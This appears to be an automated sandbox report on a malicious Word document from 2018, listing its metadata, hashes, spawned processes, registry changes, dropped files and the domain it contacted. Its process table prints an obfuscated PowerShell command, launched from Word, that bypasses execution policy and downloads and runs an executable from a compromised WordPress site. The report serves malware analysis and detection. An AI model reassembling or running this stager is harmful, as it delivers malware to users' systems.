File name: | Guide_08.11.2018_670673454.doc |
Full analysis: | https://app.any.run/tasks/d5bc39b0-93ba-44a1-abe4-1463e076f246 |
Verdict: | Malicious activity |
Analysis date: | February 10, 2019, 19:38:19 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 5.1, Name of Creating Application: Microsoft Office Word, Author: Henri Mottiez, Number of Characters: 371168, Create Time/Date: Mon Nov 5 09:46:10 2018, Last Saved Time/Date: Mon Nov 5 09:46:10 2018, Security: 0, Keywords: fugit, a, maiores, Last Saved By: Henri Mottiez, Revision Number: 918993, Subject: Guide N670673454, Template: Normal, Title: Guide N670673454, Total Editing Time: 01:00, Number of Words: 26512, Number of Pages: 54, Comments: Sequi praesentium repellendus laudantium libero quo necessitatibus laborum minima. |
MD5: | 71EEED2411A661B01DE54D5040EE4480 |
SHA1: | 04B30B110331DA01E65AC6D5EB207E9CAA9E5712 |
SHA256: | E139CD2EB02F7A93C57BC6DADDD187255617FE923379F364D33D25892B874943 |
SSDEEP: | 3072:2SacDC2kS5qXmSQZV7YJ9qmSzGt2uArD0LUhzikvQl4OSVfgvG3505dfgEEN:dacDqSDpZdYJxSit214M84/gvGgqN |
.doc | | | Microsoft Word document (33.9) |
---|
Category: | temporibus |
---|---|
Manager: | Denise Chaudet |
Company: | Carron |
Slides: | -2147483648 |
Notes: | -2147483648 |
Lines: | 559 |
HiddenSlides: | -2147483648 |
Bytes: | -2147483648 |
Paragraphs: | 250 |
Comments: | Sequi praesentium repellendus laudantium libero quo necessitatibus laborum minima. |
Pages: | 54 |
Words: | 26512 |
TotalEditTime: | 1.0 minutes |
Title: | Guide N670673454 |
Template: | Normal |
Subject: | Guide N670673454 |
RevisionNumber: | 918993 |
LastModifiedBy: | Henri Mottiez |
Keywords: | fugit, a, maiores |
Security: | None |
ModifyDate: | 2018:11:05 09:46:10 |
CreateDate: | 2018:11:05 09:46:10 |
Characters: | 371168 |
Author: | Henri Mottiez |
Software: | Microsoft Office Word |
CompObjUserType: | Microsoft Office Word 97-2003 Document |
CompObjUserTypeLen: | 39 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2804 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Guide_08.11.2018_670673454.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3772 | C:\Users\admin\AppData\Local\Temp\isqiol\usiju.exe $svddmoi='th=';$ieoooi14='qi';$avnrsro='cess; $pa';$ytxspwyu='rt-Proce';$syyoeo4='-force;';$mqreci='nfo/wp';$cgju65='e Pro';$ymkcydmi='ect S';$sgfaqz='gb.exe';$aofgogme51='press';$heyo='ove';$eieyzdi='Po';$hynf='t/t';$eyo='hemes/D';$lnaayyp='($env:tem';$eufz='DownloadF';$blyozr='ystem';$okjnxfb='l.e';$hqpeorl3='ile(''htt';$zqyb='ol'') ';$mghjhj='lic';$esv='t.W';$iclqh='New-Obj';$mkmi='y Bypa';$rcm=';Rem';$vjkcteo41=' -Scop';$axxeey=' + ''\is';$wxdba='2.hariom';$uuex='eb';$xaoue='emp';$yoo='ss $path';$adslsuy='.Ne';$ava='h); Sta';$gviei63='xe'',$pat';$ezwfne='-conten';$auya='-Item (f7f81a39-5f63-5b42-9efd-1f13b5431005#39;;$vwryiqjs='urse ';$jmxlgsy='Se';$youxai='ss';$awqziyi='p+''\tnail';$uyzt='web.i';$oigf='ps://word';$kycpat8='client).';$cmeerres='t-Executi';$owg=''');(';$nivui='-rec';$wlzo='ivi/po';$gcauay='on';$lhixui='env:t'; Invoke-Expression ($jmxlgsy+$cmeerres+$gcauay+$eieyzdi+$mghjhj+$mkmi+$youxai+$vjkcteo41+$cgju65+$avnrsro+$svddmoi+$lnaayyp+$awqziyi+$sgfaqz+$owg+$iclqh+$ymkcydmi+$blyozr+$adslsuy+$esv+$uuex+$kycpat8+$eufz+$hqpeorl3+$oigf+$aofgogme51+$wxdba+$uyzt+$mqreci+$ezwfne+$hynf+$eyo+$wlzo+$okjnxfb+$gviei63+$ava+$ytxspwyu+$yoo+$rcm+$heyo+$auya+$lhixui+$xaoue+$axxeey+$ieoooi14+$zqyb+$nivui+$vwryiqjs+$syyoeo4); | C:\Users\admin\AppData\Local\Temp\isqiol\usiju.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
(PID) Process: | (2804) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
Operation: | write | Name: | .+$ |
Value: 2E2B2400F40A0000010000000000000000000000 | |||
(PID) Process: | (2804) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1033 |
Value: Off | |||
(PID) Process: | (2804) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1033 |
Value: On | |||
(PID) Process: | (2804) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
Operation: | write | Name: | WORDFiles |
Value: 1313472542 | |||
(PID) Process: | (2804) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
Operation: | write | Name: | ProductFiles |
Value: 1313472656 | |||
(PID) Process: | (2804) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
Operation: | write | Name: | ProductFiles |
Value: 1313472657 | |||
(PID) Process: | (2804) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word |
Operation: | write | Name: | MTTT |
Value: F40A0000A2985F3C78C1D40100000000 | |||
(PID) Process: | (2804) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
Operation: | write | Name: | "-$ |
Value: 222D2400F40A000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 | |||
(PID) Process: | (2804) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
Operation: | delete value | Name: | "-$ |
Value: 222D2400F40A000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 | |||
(PID) Process: | (2804) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | UNCAsIntranet |
Value: 0 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2804 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR932E.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2804 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$ide_08.11.2018_670673454.doc | pgc | |
MD5:F4382A845E5D62CF6CEFBD47B9D4ABE1 | SHA256:05A5827FA07C13F696F5EC4C945DCE5273FA33E1FA9E36F7B555A37F3768A3FB | |||
2804 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\isqiol\Certificate.format.ps1xml | xml | |
MD5:C93A361112351B30E2C959E72789952D | SHA256:4379BD59C1328A6811584D424DF3DC193A5D607E2859D3AC1655B9124A5F100D | |||
2804 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:97134130F5D402DEF1A4F4D6C8F007FA | SHA256:5CD87DA05B66B14EE81C18E40F0A083053B878A7F3D82D5CF3212B25AF266A26 | |||
2804 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\isqiol\DotNetTypes.format.ps1xml | xml | |
MD5:1AB2FD4B6749AD6831C86411FDCAFB48 | SHA256:98540086CFC986D7604FFDED977EF20944D1715BF8453809CE736C919CB6E1EF | |||
2804 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\isqiol\en-US\about_Assignment_Operators.help.txt | text | |
MD5:D2DD0C7C3423CDC0040B68FBC475428E | SHA256:4DA2F663032A15D4ECB7A6FCB6DF8D5C07D097ED8D3FA9EC054D676584C4B411 | |||
2804 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\isqiol\Diagnostics.Format.ps1xml | text | |
MD5:FF6EEB8125B9265C5BA40AF9F7C6F6BC | SHA256:7D569C1155CFA9B7BB2BA225EE409A55C8B0E8217F3A7E05BAA39DA1BD7C4689 | |||
2804 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\isqiol\CompiledComposition.Microsoft.PowerShell.GPowerShell.dll | executable | |
MD5:A84B6952AB6A297CCE6C085FA8AB06CB | SHA256:54E3F8199D5C749920A2826C63D7C5E7E86D94874ADDCFD5C9B430671031017D | |||
2804 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\isqiol\en-US\about_arrays.help.txt | text | |
MD5:04BB4AA2CF5A5D3EAD1D9F6EEA89C034 | SHA256:0C058DF25203E39D339F127C0AE8235EE3E2E77F33B57F894E8E5A4AE6243EC8 | |||
2804 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\isqiol\en-US\about_Break.help.txt | text | |
MD5:AEDBFC39660AE3E030761ED4782CE328 | SHA256:13231768182599EC2C15B281F5E313E36428327479DA7F05FF8A92C5479214F2 |
Domain | IP | Reputation |
---|---|---|
wordpress2.hariomweb.info |
| unknown |